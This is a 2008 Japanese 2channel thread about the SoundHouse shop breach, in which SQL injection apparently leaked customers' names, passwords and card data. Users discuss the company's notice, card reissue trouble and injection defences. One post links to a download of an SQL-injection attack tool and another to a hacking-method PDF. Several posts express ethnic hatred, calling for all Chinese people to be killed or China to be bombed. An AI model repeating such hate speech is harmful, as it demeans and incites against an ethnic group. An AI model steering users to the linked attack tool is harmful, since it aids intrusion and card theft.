【ネット/通販】サウンドハウス、外部からの不正アクセスにより利用者の情報が流出[08/04/04]

このエントリーをはてなブックマークに追加
1依頼808@かくしおまコンφ ★
★サウンドハウス、外部からの不正アクセスにより利用者の情報が流出

 株式会社サウンドハウスは4月3日、同社が運営するインターネットショッピングサイトで
過去に購入した利用者の情報が流出している可能性があるとのクレジットカード会社からの
指摘を受け、セキュリティ対策を専門とする第三者機関に調査を依頼したところ、外部からの
不正アクセスよってカード情報を含む個人情報が流出した可能性が高い、との報告があったと
発表した。

 同社では現在、クレジットカード会社と連携を取りながら対策を協議しており、該当する
利用者に対しては詳細分かり次第、連絡するとしている。また、ホームページ上でも経過について
随時発表するとしている。


ソース:Yahoo!ニュース(4月4日16時35分配信 Scan)
http://headlines.yahoo.co.jp/hl?a=20080404-00000003-vgb-secu
関連リンク:サウンドハウス 個人情報の流出について
http://www.soundhouse.co.jp/shop/News.asp?NewsNo=1555
2名刺は切らしておりまして:2008/04/06(日) 21:49:26 ID:seWruNxO
バーボンハウス
3名刺は切らしておりまして:2008/04/06(日) 21:49:33 ID:q+2vq5h9
おそっ。。。
4名刺は切らしておりまして:2008/04/06(日) 22:03:51 ID:QN4V3fcC
えぇ!!マジですか・・・
5名刺は切らしておりまして:2008/04/06(日) 22:05:11 ID:nppzljEp
バーボン、バーボン、バーボンハウス

男なら、バーボンを飲め。
6名刺は切らしておりまして:2008/04/06(日) 22:05:28 ID:yBrngYfU
さっき来てたメール今見たんだがこのことだった
7名刺は切らしておりまして:2008/04/06(日) 22:06:22 ID:7Ah0Mf/F
ニュースにするの遅いな
ここのサイトで買い物した事無いけれど品揃えは随一だからめげずに頑張れ
8名刺は切らしておりまして:2008/04/06(日) 22:08:37 ID:AbFNIaV+
安売りに間に合わず悔しい思いをしたが、
ここから買わなくて良かったと思えた勝利の瞬間。
9名刺は切らしておりまして:2008/04/06(日) 22:11:57 ID:a+LH6OMR
完全に洩れてる俺の個人情報とカード情報・・・
10名刺は切らしておりまして:2008/04/06(日) 22:13:42 ID:I8dd3Udq
むかーしshure祭りのときココ使ったんだが、支払い方法に何を指定したか
まったく記憶に無い。
11名刺は切らしておりまして:2008/04/06(日) 22:22:10 ID:GtbK6fY3
携帯にメール北

        ◆◆◆  個人情報の流出について  ◆◆◆
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

お客様各位

平素は格別のご愛顧を賜り厚く御礼を申し上げます。

このたびは全く予期せぬ形で個人情報が流出する事態となり、お客様には多大な
ご迷惑、ご心配をおかけすることに至りましたこと、深くお詫び申し上げます。

現在も第三者調査機関に依頼し、調査を継続中ですが、弊社でわかる範囲で
お客様に随時、情報をお伝えしてまいります。現時点で判明したことは、今回の
弊社ホームページに対する攻撃元のIPが複数存在し、3月11日から22日の間に
仕掛けられたと考えられます。これらのIPは全て中国を発信元としており、
同時期、日本国内では同様の被害が、他社でも多数報告されているとのことです。
SQLインジェクションという手法でサイトに侵入する手口が今回、使われた
こともわかっており、只今どの範囲でデータが流出した可能性があるか、最終
確認をしております。少なくとも2007年1月1日より以前に新規会員登録を済まされて
いるお客様のデータの流出はないようです。

万が一、お客さまのカード情報が第三者に不正利用され被害が発生した場合には、
お客さまのご負担は一切ございませんので、ご安心いただきますようお願い申し
上げます。弊社としましても、この件を真摯に受け止め、スタッフ一同、お客様の
フォローに全力を注いでまいります。


━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
◆株式会社サウンドハウス 〒286-0044 千葉県成田市不動ヶ岡1958
E-MAIL: [email protected] URL:http://www.soundhouse.co.jp
携帯サイトURL: http://soundhouse.mobi/
TEL:0476-22-9333 FAX:0476-22-9334
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
12名刺は切らしておりまして:2008/04/06(日) 22:23:55 ID:uuPtfxj0
また中国かよ・・・ろくでもねぇ連中だな・・・
13名刺は切らしておりまして:2008/04/06(日) 22:31:45 ID:vtrYpZ/D
音屋は音楽関連機材の雄だからこれに懲りず頑張って欲しい。
ここが無くなったら多分数パーセントは相場が騰がると思う。
14名刺は切らしておりまして:2008/04/06(日) 22:38:07 ID:nzkzTXTX
とりあえず発信源の中国を血祭りってことでいいんじゃね?
15名刺は切らしておりまして:2008/04/06(日) 22:40:48 ID:F3fZk7Qq
SQLインジェクション
本当にあるんだね
16名刺は切らしておりまして:2008/04/06(日) 22:42:06 ID:guLOOzYr
>>15
ちょっと前にトレンドマイクロがやられたばっかじゃない
17名刺は切らしておりまして:2008/04/06(日) 22:56:49 ID:eKAXjb3v
中国!????????

まさに百害あって一利なしの国だなwwwwwwwwwwwwいい加減うぜえから分裂して滅びろwwwww
18名刺は切らしておりまして:2008/04/06(日) 23:01:53 ID:qOxDJywK
うわー、中国人による犯罪かよ。
19名刺は切らしておりまして:2008/04/06(日) 23:07:53 ID:nzkzTXTX
音屋は被害者。
悪いのはすべて中国。 中国人を全員抹殺すれば解決する問題
20名刺は切らしておりまして:2008/04/06(日) 23:56:18 ID:kImCJLBd
またシナかよ

いい加減迷惑だから地球から出て行けよ糞が
21名刺は切らしておりまして:2008/04/07(月) 05:03:27 ID:QFzwtngZ
サウンドハウスからメールきたよー
22名刺は切らしておりまして:2008/04/07(月) 12:46:18 ID:dV4Vk1Io
PCでいうとサクセスみたいな店なのに擁護派が多いなw

入荷できるか分からんものを注文取ってキャンセル不可にするとことかかなり悪質なのに
23名刺は切らしておりまして:2008/04/07(月) 15:35:59 ID:lb4QPzc3
メールきた
無条件で賠償しろ
24名刺は切らしておりまして:2008/04/07(月) 19:48:24 ID:VxEt23Y+
中国には、そろそろ我慢の限界
空爆して空き地にしちゃえ
25名刺は切らしておりまして:2008/04/07(月) 20:11:29 ID:OS+VU3Pl
俺もメールきた。
とりあえず何かくれ!w
26名刺は切らしておりまして:2008/04/07(月) 20:16:14 ID:NaJ0zKMn
>>24
サウンドハウスは悪くないんでしょ?
27名刺は切らしておりまして:2008/04/07(月) 21:46:31 ID:5M6EUG//
メール来ないと思ってたら、迷惑メールに来てたよ
しかし、クレジット番号が晒されたのは初めてだ
やっぱあるんだな こういうの
28名刺は切らしておりまして:2008/04/07(月) 22:22:56 ID:NjPfntYd
>>26
ま、今回は中国からのクラッキングの様なのでサウンドハウスも被害者。
もっとも、セキュリティが甘かったのかもしれないけどね。
29名刺は切らしておりまして:2008/04/07(月) 23:34:05 ID:a5P26e16
これまでのまとめ。(重要事項)

007年1月1日〜2008年3月22日までに新規会員登録を行ったお客様のデータ、総数
122,884件の内、最大97,500件まで下記のデータが流出した可能性があります(内
カード情報保有データ27,743件)。
・お名前 ・フリガナ ・性別 ・生年月日
・ログイン用メールアドレス ・ログイン用パスワード
・クレジットカード情報 (ご名義 /カード番号 /有効期限)

この期間にサウンドハウスでクレジットカード登録、決済をした人は、今後盗まれた
クレジットカード情報 (名義 /カード番号 /有効期限)で、不正決済をされる可能性が
多分にあるので、ただちにクレジットカード会社に連絡してカードを停止する必要が
あります。

すでに盗まれたクレジットカード情報を不正利用された被害がでて、その結果この
カード情報漏洩問題が発覚し、今回の騒ぎになっていることを忘れないように。
30名刺は切らしておりまして:2008/04/07(月) 23:49:52 ID:KSGPMqi3
SQLインジェクションってところが情けないな。
プレースホルダ使えよ・・・
低脳技術者にプログラム作らせるとこうなるという見本です。
31名刺は切らしておりまして:2008/04/08(火) 00:02:31 ID:xM3GOzzz


またしてもWindows鯖なわけだが・・・。
http://uptime.netcraft.com/up/graph?site=http://www.soundhouse.co.jp/

しかし、SQLインジェクションを狙い打ってるというが、
Web+DBなんてApache+MySQLの方が割合が大きいだろうに。
IIS+MS SQLだけクラックされるって何か別の要因があんじゃね?



32名刺は切らしておりまして:2008/04/08(火) 00:07:53 ID:r3x5Er/7
>>31
まともな知識のあるやつがWin鯖管理するのと、ダメダメな奴がUnix鯖管理するのとでは、
前者の方がはるかに堅牢なんだけどね。

そもそもSQL Server使ってるなら、当たり前だけどプレースホルダはあるし、
そうでなくても入力データは全て汚染されているものとしてエスケープかけるのは常識でしょう。

OSがWinとかLinuxとかいう前に、ホント寒いレベルの問題ですよSQLインジェクションなんて。
33名刺は切らしておりまして:2008/04/08(火) 00:12:59 ID:CS+t6ccp
>>32

じゃ、なんで今回IISとMS SQL Serverで組んだシステムばかりやられてるわけ?
プログラムのポカならWin鯖でもLinux鯖でも同程度起こるだろうに・・・。

34名刺は切らしておりまして:2008/04/08(火) 00:19:17 ID:engegzS+
466 名前:237[sage] 投稿日:2008/04/04(金) 18:32:33
では、俺ももう一度。

カード会社:orico(VISA)
カード会社からの連絡:なし
連絡方法:電話
利用停止:こちらから依頼したが断られた。
カード再発行:こちらから依頼したが断られた。
再発行手数料:
最終利用時期:クレカでは2007年11月頃、3月下旬にクレカ利用が停止していたので代引きを利用した。
不正使用被害:今のところ無し(電話で確認してもらった)
カード会社の不正使用に対する対応:
(1)被害にあっていないので、カードの利用停止や再発行はできない。「あなたはそういったことがある度にカードを停止・再発行するつもりですか?」
と聞かれたので「情報が漏れた可能性がある場合は、そうせざるを得ない」と答えると、「その都度再発行はできないので、今回もできない」と言われた。
(2)被害にあったときは、一旦代金を支払ってもらった後で調査し、不正が確認できれば返金する。
(3)不正があったときは必ず調査でわかるのかと質問したところ、調査するとの答えるだけで、明確な回答は無かった。
35名刺は切らしておりまして:2008/04/08(火) 00:22:02 ID:hixI4Q+z
深夜前後のTVニュースでさんざんいっている。今日の全国紙、朝刊一面トップだね。
社員がいくら工作しても、傷穴をどんどん広げるだけ!

これまでのまとめ。(重要事項)

007年1月1日〜2008年3月22日までに新規会員登録を行ったお客様のデータ、総数
122,884件の内、最大97,500件まで下記のデータが流出した可能性があります(内
カード情報保有データ27,743件)。
・お名前 ・フリガナ ・性別 ・生年月日
・ログイン用メールアドレス ・ログイン用パスワード
・クレジットカード情報 (ご名義 /カード番号 /有効期限)

この期間にサウンドハウスでクレジットカード登録、決済をした人は、今後盗まれた
クレジットカード情報 (名義 /カード番号 /有効期限)で、不正決済をされる可能性が
多分にあるので、ただちにクレジットカード会社に連絡してカードを停止する必要が
あります。

すでに盗まれたクレジットカード情報を不正利用された被害がでて、その結果この
カード情報漏洩問題が発覚し、今回の騒ぎになっていることを忘れないように。
36名刺は切らしておりまして:2008/04/08(火) 00:23:59 ID:r3x5Er/7
>>33
そこまで知らねぇよ。一般論を言っただけで。
例えばそうだな、SQLインジェクションは表向きの理由で実は・・・とかなwww

まあ、ちょっと真面目に考えてみると、Winの技術者にショボイ奴が多いって推理はどうだ?
Unix系技術者には常識のことがWin系技術者には通用しないことが多々あったりとか。

で、平気でSQLインジェクションされちゃうようなゴミプログラムしか書けないやつがWin開発者に多かった、と。
37名刺は切らしておりまして:2008/04/08(火) 00:36:40 ID:mPISheRT
>>31
攻撃ツールがIIS+MSSQL対応だっただけじゃね?
38名刺は切らしておりまして:2008/04/08(火) 00:38:46 ID:u4k23fef
>>37

シェアから言えば、初めからLinux鯖狙った方が効率いいだろ。
39名刺は切らしておりまして:2008/04/08(火) 00:38:57 ID:wsxSt+Dh
ダメダメな奴はサバ缶なんてやっちゃだめ。
windowsとかUNIXとか言い出すのは変。どっちもダメだもん。ダメサバ缶の前では。
40名刺は切らしておりまして:2008/04/08(火) 00:40:26 ID:BDc1iaf4
実は、この会社の悪い奴が個人情報を抜き出して売りさばいていたってことはないよね?

つまり自作自演ってことは本当にない?
41名刺は切らしておりまして:2008/04/08(火) 00:44:09 ID:r3x5Er/7
>>38
いや、Win鯖の方が、鯖管やプログラムのレベルが低いからインジェクション(その他の手法でも)成功率が
高まるんですよww

まあ今回のもどうせブビ厨上がり(その前はコボラー上がり(笑))の奴らが「お前ら次の仕事はASPだぞー」
なんていわれて集まって、またぞろVBでゴリゴリプログラム書いてたんだろうなーって
容易に想像できるわw
42名刺は切らしておりまして:2008/04/08(火) 00:55:22 ID:ulIpi/nl
>>33
スキルの無い奴ほどWin鯖を好む傾向
43名刺は切らしておりまして:2008/04/08(火) 05:27:32 ID:lCpXJxYq
ちょっと前までSQLServerの管理者IDはパスワードなしがデフォルトだったなw
44名刺は切らしておりまして:2008/04/08(火) 06:33:48 ID:6o3hULwV
>>39
あ、核心を。(w
45名刺は切らしておりまして:2008/04/08(火) 06:56:56 ID:LKCl02oz
自分は対象外つうメール来た
まぁここに登録してたカード、この件とは関係なく先月で使用やめたんだけど
46名刺は切らしておりまして:2008/04/08(火) 22:21:15 ID:IJL6cpP2
>>40
おれも、それを考えた。
なんか、中国からの攻撃ってことにすれば、批難の矛先がそっちに向くと
考えてるような感じがしてしょうがないんだよな。
47名刺は切らしておりまして:2008/04/08(火) 22:25:28 ID:IJL6cpP2
だいたい、SQLインジェクションでやられてしまうようなシステムで、
攻撃の内容を正確に把握できるだけのログを取っていたとは思えないんだけど。
どうせIISのログくらいしか残ってないんだろ。
48名刺は切らしておりまして:2008/04/08(火) 22:26:08 ID:wWFOzlOa
代引きで買ってたんで名前と生年月日だけ漏れましたという
メール来てたな。
49名刺は切らしておりまして:2008/04/08(火) 23:13:31 ID:xLiA74YG
Windows Serverだからアップデートとか自動的に適用されると思うんだけど、
M$はセキュリティーホールを放置なのかよ?
50名刺は切らしておりまして:2008/04/08(火) 23:21:58 ID:apb2hBhS
>>49
正直、Winサーバの場合アップデイトをかけると急に動作仕様が変わって構築したシステムが
動かなくなることもあるので、イージーにアップデイト出来ないこともある。

で、とりあえず様子見 → 大丈夫そうだから放置 → ある時突然クラック → 泣きながらシステム再構築

というのがよくあるパターン。

51名刺は切らしておりまして:2008/04/08(火) 23:51:16 ID:IJL6cpP2
>>49
これMSのセキュリティホールじゃないと思うよ。
サーバーアプリケーションの実装の問題。
52名刺は切らしておりまして:2008/04/09(水) 00:05:33 ID:Fhe0jFRl
>>49
SQLインジェクションという手口が事実なら、WindowsかLinuxなんて
レベルの問題じゃないよ。
純粋にプログラムの実装レベルのお話。
要するにこれ作ったプログラマがバカなだけww
別にLinuxでもタコなプログラム書けばSQLインジェクションでヤラれますから。
53名刺は切らしておりまして:2008/04/09(水) 00:58:56 ID:pDoV8DSl
まあ、サウンドハウスとかはわかるんだが、トレンドマイクロっていうのはどうなのさ?

* 2005年5月に発生した、価格.comのWebサイトへの改竄攻撃事件でのシステム侵入者の攻撃方法は、このSQLインジェクションによるものであると言われている。
* 2005年11月に発生した、「ワコールオンラインショップ」個人情報漏洩の手口はSQLインジェクションである。
* 2008年3月に発生した、トレンドマイクロ、@niftyのWebサイトの改竄はSQLインジェクションによるものである。
* 2008年4月に発生した、サウンドハウスの個人情報漏洩の手口はSQLインジェクションによるものである。

http://ja.wikipedia.org/wiki/SQL%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%A7%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3
54名刺は切らしておりまして:2008/04/09(水) 01:30:44 ID:KFToH3Yy


今回のは、単純なSQLインジェクションでは無いのだが…

専用のクラッキングツール使って、IIS+SQLサーバ+ASP+SJISの文字列が引き起こす穴をついてる。

マルチバイト言語に対する、インジェクション対策の為の文字列チェック・エスケープ処理は難しいのに、今更とか書いてる人こそ、なんちゃってなのでは?

mysqlのエスケープ関数のコードを追ってみるといいよ


55名刺は切らしておりまして:2008/04/09(水) 01:41:54 ID:yBrrXCtA
をぃをぃをぃ
こないだバウンダリー4本買ったばっかりだ・・・
56名刺は切らしておりまして:2008/04/09(水) 02:23:29 ID:1RUgtfc6
434 名前:名無しさん@八周年[sage] 投稿日:2008/04/07(月) 23:20:16 ID:7jMzikMv0
>>400
時間      提交者 頁面                        看快照
2008-02-18 電脳迷 http://www.soundhouse.co.jp/jslib/asp1.asp 快照

見つけた

Mirror saved on 2008-02-18 18:15:13
Reason:僅作安全検測

IP&Port:210.143.133.210:80
Domain:www.soundhouse.co.jp
Url:http://www.soundhouse.co.jp/jslib/asp1.asp
System:未知系統/其他系統
WebServer:Microsoft-IIS
Hacker@Team:電脳迷
57名刺は切らしておりまして:2008/04/09(水) 03:56:11 ID:bByRX0gg
>>48
金銭的被害がなくても、
それより重要な事は、個人情報が盗まれたことによる、二次的被害の方が心配だろうな。

つまり貴方名義による偽造パスポートの取得や、クレジットカードの不正取得など。
あるいは貴方本人になりすまして第三国に入国されるなど。。被害は甚大になる可能性のほうが怖いぞ。
58名刺は切らしておりまして:2008/04/09(水) 08:22:15 ID:6xujug51
>>54
煩雑なのは確かだが、そんなに難しいわけではないぞ。
そもそも、難しいかどうかよりも、そういう攻撃を想定していたかどうかの問題。
想定してたのに、難しいから実装して無かったとかいう話だったら、とんでもない話。
59名刺は切らしておりまして:2008/04/09(水) 08:24:54 ID:tZfsyVkd
バッカーセーフw
60名刺は切らしておりまして:2008/04/09(水) 08:27:19 ID:tZfsyVkd
>>57
それは大袈裟というか、ハックしなくても出来る訳で意味無いだろ。
やっぱ問題は同じようにネットや通販での個人情報照合の危険だなあ。
どんどん蓄積されて、将来立派に丸裸にされますね。
61名刺は切らしておりまして:2008/04/09(水) 12:11:54 ID:83No9gXC
ハックしなくても、しても出来る事だから、油断はしないほうがいいぞ。

日本人の感覚とは大違いのところの有る人種だからな。
62名刺は切らしておりまして:2008/04/09(水) 22:51:55 ID:rX62uS/X
ここって売り上げと粗利どのくらい?
63名刺は切らしておりまして:2008/04/09(水) 23:10:23 ID:D19OZ95n
人大杉になったらESCキーを押しながら左クリックしてアドレスバーに表示される
read.cgiをread.htmlに書き換えてエンターを押す
64名刺は切らしておりまして:2008/04/09(水) 23:14:18 ID:bgQ8ttSU
YahooBBで漏洩しちゃってるからどうでもいいやw
65名刺は切らしておりまして:2008/04/10(木) 14:33:42 ID:XCOROnFW
603 :名無しサンプリング@48kHz:2008/04/09(水) 23:19:06 ID:cn/BPh2R
>>591
怖くて踏めない? ハック方法解説ブログを pdf に変換しといた奴うpしとくよ

ttp://sakuratan.ddo.jp/uploader/source/date77685.pdf
66名刺は切らしておりまして:2008/04/10(木) 17:23:22 ID:aAn1jOMQ
58 名前: 中国人留学生(プーアル茶)[] 投稿日:2008/04/10(木) 16:40:27.41 ID:xbYqVJKW0
これが、今回SQL注入に使用された工具なんだが
おまえら使うなよ ぜったい使うなよ

[L?核]NBSI3.0 hack520?用版(已去后?)
ttp://dvd.3800hk.com/dispbbs.asp?BoardID=61&replyID=228554&id=151131&skin=1

67名刺は切らしておりまして:2008/04/10(木) 18:03:01 ID:Na5LMci7
【Winny】 ロリコン動画から乱交ものまで…イケメン教師、エロ恐ろしい性癖が晒されることに
http://mamono.2ch.net/test/read.cgi/newsplus/1207816686/
68名刺は切らしておりまして:2008/04/10(木) 18:35:03 ID:95XRV4lH
>>66のリンク絶対踏まない方がいいぞ

         ↓

995 名前:名無しさん@八周年[sage] 投稿日:2008/04/10(木) 17:23:40 ID:LL1GJyBi0
>>993
注意!アラートオープンを発見! (1)
注意!ループタグを発見! (1)
ブラクラチェックが終了しました。

※ プラグインデータを発見しました。(1)
※ 隠しスクリプトを発見しました。(5)





サウンドハウス2chに工作しに来てるだろ?
69名刺は切らしておりまして:2008/04/10(木) 19:22:30 ID:95XRV4lH
通報用テンプレ

警察庁http://www.npa.go.jp/
大阪府警http://www.police.pref.osaka.jp/
NHKhttp://www.nhk.or.jp/
日本テレビhttp://www.ntv.co.jp/
東京放送(TBS)http://www.tbs.co.jp/
フジテレビジョンhttp://www.fujitv.co.jp/
テレビ朝日http://www.tv-asahi.co.jp/
テレビ東京http://www.tv-tokyo.co.jp/
東京MXTVhttp://www.mxtv.co.jp/
徳島新聞:[email protected] 読売新聞:[email protected]
朝日新聞:[email protected] 毎日新聞:[email protected]
産経新聞:[email protected] 日経新聞:[email protected]
中日新聞:[email protected] 東京新聞:[email protected]
北海道新聞:[email protected] 河北新報社:[email protected]
新潟日報:[email protected] 大阪日日新聞:[email protected]
神戸新聞:[email protected] 中國新聞:[email protected]
日刊ゲンダイ:[email protected] 夕刊フジ:[email protected]
日刊スポーツ:[email protected] スポーツニッポン:[email protected]
報知新聞社:[email protected] 週刊現代:[email protected]
週刊ポスト:[email protected] 週刊文春:[email protected]
週刊新潮:[email protected] AERA:[email protected]
サンデー毎日:[email protected] 噂の真相:[email protected]
サンスポ:[email protected] 中日スポーツ:[email protected]
東京中日スポーツ:[email protected] デイリースポーツ:[email protected]
時事通信社:[email protected] 共同通信社:[email protected]
CNN:[email protected] BBC:[email protected]
ロイター通信:[email protected][email protected]
インプレスINTERNET-WATCH: [email protected] ネットバム:[email protected]
CNET:[email protected]
70サウンドハウス個人情報流出被害者の会:2008/04/10(木) 20:37:00 ID:Z4bBZbpw
「サウンドハウス個人情報流出被害者の会」
流出した情報の個人特定性の高さ、クレジットカード不正使用実被害発生について、
サウンドハウスの虚偽、報告義務の隠蔽による、被害の拡大、誠意無き対応、
この度被害に遭われた、顧客の皆様の早急なる「被害者の会」設立を提案致します。

・お名前
・フリガナ
・性別
・生年月日
・サウンドハウスサイト ログイン用メールアドレス
・サウンドハウスサイト ログイン用パスワード
・クレジットカード情報(会社名・カード番号・有効期限・ご名義)
71名刺は切らしておりまして:2008/04/10(木) 22:50:36 ID:95XRV4lH
[9万人]サウンドハウス問題被害者の会[最大被害]
http://life9.2ch.net/test/read.cgi/credit/1207826606/
72名刺は切らしておりまして:2008/04/11(金) 14:48:27 ID:4VbNE9Og
本スレ誘導

【社会】中国国内から「SQLインジェクション」…カード番号など流出した可能性 - サウンドハウス★2
http://mamono.2ch.net/test/read.cgi/newsplus/1207878417/
73サウンドハウス個人情報流出被害者の会:2008/04/11(金) 16:26:07 ID:r3xBff5M
「サウンドハウス個人情報流出被害者の会」
流出した情報の個人特定性の高さ、クレジットカード不正使用実被害発生について、
サウンドハウスの虚偽、報告義務の隠蔽による、被害の拡大、誠意無き対応、
この度被害に遭われた、顧客の皆様の早急なる「被害者の会」設立を提案致します。
過去、クレジットカードご利用の皆様は、不正使用実被害発生の有無に関わらず、
再発行の手続きをされる事を、お勧め致します。

サウンドハウス発表個人情報流出内容
・お名前
・フリガナ
・性別
・生年月日
・サウンドハウスサイト ログイン用メールアドレス
・サウンドハウスサイト ログイン用パスワード
・クレジットカード情報(会社名・カード番号・有効期限・ご名義)

サウンドハウスが会社体質を改め、真摯に事態を受け止め、
誠意ある過去の顧客対応、被害対応発表を行う事を願っております。
74サウンドハウス個人情報流出被害者の会:2008/04/12(土) 00:07:47 ID:HiIoBC8Z
「サウンドハウス個人情報流出被害者の会」
流出した情報の個人特定性の高さ、クレジットカード不正使用実被害発生について、
サウンドハウスの虚偽、報告義務の隠蔽による、被害の拡大、誠意無き対応、
この度被害に遭われた、顧客の皆様の早急なる「被害者の会」設立を提案致します。

過去、クレジットカードご利用の皆様は、不正使用実被害発生の有無に関わらず、
再発行の手続きをされる事を、お勧め致します。

サウンドハウス発表個人情報流出内容
・お名前
・フリガナ
・性別
・生年月日
・サウンドハウスサイト ログイン用メールアドレス
・サウンドハウスサイト ログイン用パスワード
・クレジットカード情報(会社名・カード番号・有効期限・ご名義)

サウンドハウスが会社体質を改め、真摯に事態を受け止め、
誠意ある過去の顧客対応、被害対応発表を行う事を願っております。
75個人情報流出被害:2008/04/12(土) 00:16:57 ID:HiIoBC8Z
サウンドハウス掲示板に違和感を感じませんか ?
http://bbs.soundhouse.co.jp/bbs_sonota/sonota_index.htm

サウンドハウスニュースに違和感を感じませんか ?
http://www.soundhouse.co.jp/shop/News.asp?NewsNo=1556
http://www.soundhouse.co.jp/shop/News.asp?NewsNo=1557
http://www.soundhouse.co.jp/shop/News.asp?NewsNo=1558
http://www.soundhouse.co.jp/shop/News.asp?NewsNo=1560

サウンドハウスの企業体質に違和感を感じませんか ?
76思想:2008/04/12(土) 02:31:14 ID:HiIoBC8Z
株式会社サウンドハウス
代表取締役社長 中島尚彦 様
http://www.naritacity.com/
77名刺は切らしておりまして:2008/04/12(土) 03:25:46 ID:5Mvt0sFG
品揃えは良いが高い
78名刺は切らしておりまして:2008/04/12(土) 03:30:59 ID:57Fi4oay
【芸能】金八先生の息子こと佐野泰臣がファイル共有ソフトのウィルスに感染?
綾瀬はるかとのプライベート写真流出で芸能界に衝撃
http://search.l-o-j.net/viewthread.php?tid=293641
79名刺は切らしておりまして:2008/04/12(土) 03:33:45 ID:cZQzuKXJ
■2000年 東芝ノートパソコン騒動
2000年 4月     アメリカで東芝ノートパソコン集団訴訟に和解金で合意。
2000年 4月13日〜20日 ダライ・ラマ来日。
2000年 5月18日ごろ ネット発の東芝ノートパソコン不買運動勃発。
2000年 5月22日  東芝副社長 中国記者会見で3時間つるし上げ。
■2003年 西安寸劇事件 
2003年10月29日 西安寸劇事件。 
2003年10月30日 西安反日デモ飛び火。
2003年10月31日ダライ・ラマ来日。 中国、日本を非難。
2003年11月 1日 反日デモ収束に向かう。
2003年11月11日 ダライ・ラマ離日。
■2005年 反日暴動
2005年4月8日 ダライ・ラマ来日
2005年4月9日 北京大使館 支那人暴徒に襲われる。
2005年4月16日 上海領事館 支那人暴徒に襲われる。
2005年4月19日 ダライ・ラマ離日。李肇星外相『形勢報告会』で対日関係の現状を報告。
2005年4月20日 胡錦濤政権 反日デモ収束を図るが、収まらず。
http://www2.atwiki.jp/aaaaa/?cmd=upload&act=open&pageid=6&file=top001.gif
■2007年 政権批判暴動を恐れる支那
2007年11月15日〜19日 ダライ・ラマ訪日
反日暴動が反体制暴動に転じるのを恐れる胡錦濤は目立った嫌がらせをしなかった。
■2008年 オリンピック暴動を恐れる支那
2008年4月10日〜11日 ダライ・ラマ飛行機乗り換えの為の立ち寄り
テレビ朝日・TBSなどがダライ・ラマを貶めるような報道を行う。

ダライ・ラマはノーベル平和賞受賞者ですが、原則としてその訪日はテレビ・新聞等の
全国メディアで報じられることがありません。中国からの言論弾圧におもねっているからです。
わずかにテレビのローカルニュースと新聞の地方欄の片隅で報じられることがあります
80名刺は切らしておりまして:2008/04/13(日) 14:09:38 ID:aAf40690
AIU賠償責任保険 個人情報漏洩保険のご契約内容
1. 危機管理コンサルティング
個人情報の漏洩が発覚したら直ちに、被害者への対応方法、メディア対策などの危機管理(初期対応)におけるコンサルティングを一定金額まで補償し、
* 風評被害
* ブランド劣化
* 株価ダウン
* 集団訴訟
などの可能性を抑制!
賠償責任保険 個人情報漏洩保険のご契約内容

2. 危機管理実行費用補償
貴社が危機管理を実行する上で必要となる以下のような費用を補償!
※貴社が公的機関に届出るかメディア、インターネットなどにより公表された場合に限ります。
* 謝罪会見費用
* 謝罪広告費用
* 謝罪文作成・送付費用
* 事故原因調査費用
* 弁護士相談費用
* 見舞金(500円/件を上限とします)
賠償責任保険 個人情報漏洩保険のご契約内容

3. 争訟費用損害賠償金
被害者や委託元など、第三者から損害賠償を請求されたり訴訟を提起されたときは、
* 損害賠償金
* 訴訟費用(弁護士費用など)
を補償!
財務面でのリスクヘッジにより、企業の安定経営や株主に対する説明責任をサポート!
81名刺は切らしておりまして:2008/04/13(日) 14:10:52 ID:aAf40690
> Q14.HACKER SAFEマークを表示することによる、メリットは何ですか?
>
> セキュリティ対策を実施している証明(コンプライアンス証明)になります。
> マーク表示によりサイトでの売上が向上し、Googleでのランキングが向上しますので、
> SEO対策としても有効です。
> また、HACKER SAFEの個人情報漏洩保険が自動的に付帯されます。
>                ========

定款がよくわからんが、「個人情報漏洩保険」 有りだそうな。
よかった、最終的には、ここにケツを持っていけばいいのかw

> Q16.セキュリティの問題が100%解消されますか?
>
> それは難しいです。 100%解消される。という状況はどのようなことにおいても存在しません。
> 特にセキュリティというものは利便性と安全性のバランスで成立しております。
> セキュリティにおいて重要なことは、どのような人が管理しているか、そして管理者がシステム
> に対してどのような知識を持ち、システムの保護にどのような技術を利用し、
> そしてシステムの安全性維持のためにどのような方法を採用するかといったことです。

最終的には、使う奴のスキル次第だとwww
82名刺は切らしておりまして:2008/04/13(日) 17:17:18 ID:Jii+CTtm
>>80 マルチ乙

上限500円とか意味不明なソース貼るなよ音屋
そんなはした金いらないから。
場合によっては、判例から安く見積もってもおまえ等流出被害者9万人に
最低1万円以上は払うことになるからな。そして路頭に迷えw
83個人情報流出被害:2008/04/13(日) 18:15:46 ID:sADjWDy/
「サウンドハウス個人情報流出被害者の皆様へ」
流出した情報の個人特定性の高さ、クレジットカード不正使用実被害発生について、
サウンドハウスの虚偽、報告義務の隠蔽による、被害の拡大、誠意無き対応、
この度被害に遭われた、顧客の皆様の早急なる「被害者の会」設立を提案致します。
過去、クレジットカードご利用の皆様は、不正使用実被害発生の有無に関わらず、
再発行の手続きをされる事を、お勧め致します。
サウンドハウス発表個人情報流出内容
・お名前
・フリガナ
・性別
・生年月日
・サウンドハウスサイト ログイン用メールアドレス
・サウンドハウスサイト ログイン用パスワード
・クレジットカード情報(会社名・カード番号・有効期限・ご名義)
サウンドハウスが会社体質を改め、真摯に事態を受け止め、
誠意ある過去の顧客対応、被害対応発表を行う事を願っております。

サウンドハウス掲示板は発言操作されていませんか ?
http://bbs.soundhouse.co.jp/bbs_sonota/sonota_index.htm

サウンドハウスニュースに違和感を感じませんか ?
http://www.soundhouse.co.jp/shop/News.asp?NewsNo=1556
http://www.soundhouse.co.jp/shop/News.asp?NewsNo=1557
http://www.soundhouse.co.jp/shop/News.asp?NewsNo=1558
http://www.soundhouse.co.jp/shop/News.asp?NewsNo=1560

サウンドハウスの企業体質に違和感を感じませんか ?
株式会社サウンドハウス
代表取締役社長 中島尚彦 様
http://www.naritacity.com/
84名刺は切らしておりまして:2008/04/13(日) 18:18:47 ID:II4UVzPF
>>82
お前は頭おかしいだろ。悪いのはハッキング詐欺集団であって
音屋は被害者だw

文句あるなら詐欺集団に文句をいうべきだろw

85名刺は切らしておりまして:2008/04/13(日) 18:24:34 ID:Jii+CTtm
>>84 そんな書き込みは通用しないから。路頭に迷えw
